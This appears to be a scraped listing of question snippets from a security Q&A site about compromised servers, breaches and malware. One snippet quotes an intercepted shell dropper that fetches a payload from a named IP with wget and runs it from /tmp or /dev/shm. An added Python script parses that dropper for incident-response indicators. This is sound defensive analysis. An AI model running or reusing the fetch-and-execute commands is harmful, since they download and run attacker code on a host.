I suspect that one or more of my servers is compromised by a hacker, virus, or other mechanism:
What are my first steps? When I arrive on site should I disconnect the server, preserve "evidence", are there other initial considerations?
How do I go…
Yesterday, I was performing a bit of general maintenance on a VPS of mine, using the IPMI console my host provided.
Upon setting up SSH keys again via the IPMI console, I logged in via SSH and was shocked to see this:
Welcome to Ubuntu 14.04.2 LTS…
When a machine has been infected with malware, most of us here immediately identify the appropriate action as "nuke it from orbit" - i.e. wipe the system and start over. Unfortunately, this is often costly for a company, especially if backups are…
Yesterday, Twitter announced that they recently identified a bug that stored passwords unmasked in an internal log. Recently, Github also had a similar bug. In both cases, they claim that nobody had access to these files.
Twitter:
We have fixed the…
I was using my laptop at a Starbucks on a table, and a person was using a laptop on the same table across from me, a couple seats to my side. He flicked some plastic thing across the table towards my laptop. What really freaked me out was he then…
On this ISC article on DVR compromise the author talks about the compromise of an embedded system. In particular, the attacker executes a series of echo commands on the remote host, and:
This DVR has no "upload" feature. There is no wget nor is…
Since it has recently been proven that transferring data through the USB port is fundamentally flawed, I'm wondering if there are 100% secure ways to transfer data without using the Internet.
Suppose Alan has a computer system that has been…
We got an official email saying that our website had been hacked. They cited the URL to use to see the new suspicious file that had been dropped in our web root folder (s.htm). Just some text about a "Morrocan Made hacker - I'm Back" in the HTML…
Can a malware that infected your local computer compromise a KeePass database stored locally in any way?
If yes, what's the point of KeePass having such strong security mechanisms if it cannot resist this scenario? If you keep your DB locally,…
Earlier today I received a notification of a security incident at Mandrill. At first I was concerned, but then after I dove into the details I became confused as to why they considered this noteworthy at all.
To summarize, it appears that Mandrill…
I have intercepted an attack on my web server that I believe was unsuccessful. The attacker tried to execute this script:
#!/bin/sh
cd /tmp;cd /dev/shm                        # stage in a world-writable directory; /dev/shm is usually tmpfs, so nothing persists on disk
wget -q http://221.132.37.26/xx -O ...x    # quietly fetch the payload and save it under a name meant to be overlooked in listings
chmod +x ...x                              # make the dropped file executable
./...x                                     # run it
cd /dev/shm ; wget…
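When a dropper like the one above is captured, the first thing a responder wants is the set of indicators to record and hunt for on other hosts: the download URL and host, the file name the payload is written under, what gets made executable and run, and which directories are used for staging. The following Python script is an added example (not part of the original post) that walks a shell dropper command by command and pulls those out; the sample script embedded in it is constructed from the lines quoted above, with the truncated final `wget…` line left out because the post cuts it off.

```python
"""Extract incident-response indicators from a captured shell dropper.

Added example. It tokenises each simple command of a dropper script and
records: URLs fetched with wget/curl and their hosts, the local names the
payload is saved under (-O / -o targets and chmod'd files), anything the
script executes, and the directories it cd's into for staging.
"""
import re
import shlex
from dataclasses import dataclass, field

# Constructed sample input: the dropper quoted in the post above. The
# post's last line is truncated ("wget…"), so it is not reproduced here.
SAMPLE_DROPPER = """#!/bin/sh
cd /tmp;cd /dev/shm
wget -q http://221.132.37.26/xx -O ...x
chmod +x ...x
./...x
"""

URL_RE = re.compile(r"https?://[^\s'\";|&]+")
# chmod mode operands: symbolic (+x, u+rwx, a=rx) or octal (755, 0755)
MODE_RE = re.compile(r"^(?:[ugoa]*[+\-=][rwxXst]*|[0-7]{3,4})$")


@dataclass
class Iocs:
    urls: list = field(default_factory=list)
    hosts: list = field(default_factory=list)
    dropped_files: list = field(default_factory=list)
    executed: list = field(default_factory=list)
    staging_dirs: list = field(default_factory=list)


def _add(lst: list, item: str) -> None:
    """Append without duplicates, preserving first-seen order."""
    if item not in lst:
        lst.append(item)


def _commands(script: str):
    """Yield each simple command as an argv list.

    Lines are split on ';', '&&', '||' and '|'; blank lines, comments and
    the shebang are skipped. shlex handles quoting; on unbalanced quotes
    we fall back to whitespace splitting rather than losing the command.
    """
    for line in script.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        for piece in re.split(r"\s*(?:;|&&|\|\||\|)\s*", line):
            if not piece:
                continue
            try:
                argv = shlex.split(piece)
            except ValueError:
                argv = piece.split()
            if argv:
                yield argv


def extract_iocs(script: str) -> Iocs:
    """Return the indicators found in a dropper script."""
    iocs = Iocs()
    for argv in _commands(script):
        cmd, args = argv[0], argv[1:]
        if cmd == "cd" and args:
            _add(iocs.staging_dirs, args[0])
        elif cmd in ("wget", "curl"):
            for arg in args:
                m = URL_RE.match(arg)
                if m:
                    url = m.group(0)
                    _add(iocs.urls, url)
                    _add(iocs.hosts, re.sub(r"^https?://", "", url).split("/")[0])
            # wget -O <file> and curl -o <file> name the dropped payload
            for flag in ("-O", "-o"):
                if flag in args and args.index(flag) + 1 < len(args):
                    _add(iocs.dropped_files, args[args.index(flag) + 1])
        elif cmd == "chmod":
            for arg in args:
                if not MODE_RE.match(arg):
                    _add(iocs.dropped_files, arg)
        elif cmd.startswith("./") or cmd.startswith("/"):
            _add(iocs.executed, cmd)
    return iocs


if __name__ == "__main__":
    found = extract_iocs(SAMPLE_DROPPER)
    for name, values in vars(found).items():
        print(f"{name}: {values}")
```

The output for the quoted dropper is the host `221.132.37.26`, the dropped name `...x`, execution of `./...x`, and the staging directories `/tmp` and `/dev/shm`; those are the strings to search for in proxy and firewall logs and in `/dev/shm` and `/tmp` on every other host, since a dropper that landed here was almost certainly sprayed more widely.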
I was discussing with someone ways to prevent data disclosure from a compromised admin account on a database server. The other person proposed encrypting the data at rest within the database. It sounds like a good idea, but I wasn't sure if that…
It was recently disclosed that private information pertaining to over 500 million Yahoo accounts was stolen.
Yahoo's Chief Information Security Officer, Bob Lord, states that the information was stolen from Yahoo's computers by what Yahoo "believes…
My EC2 instance was hacked recently. It doesn't really matter as I'm just starting my website and there was no sensitive information on my server yet, but I do plan for there to be in the future. I am going to terminate the compromised server and…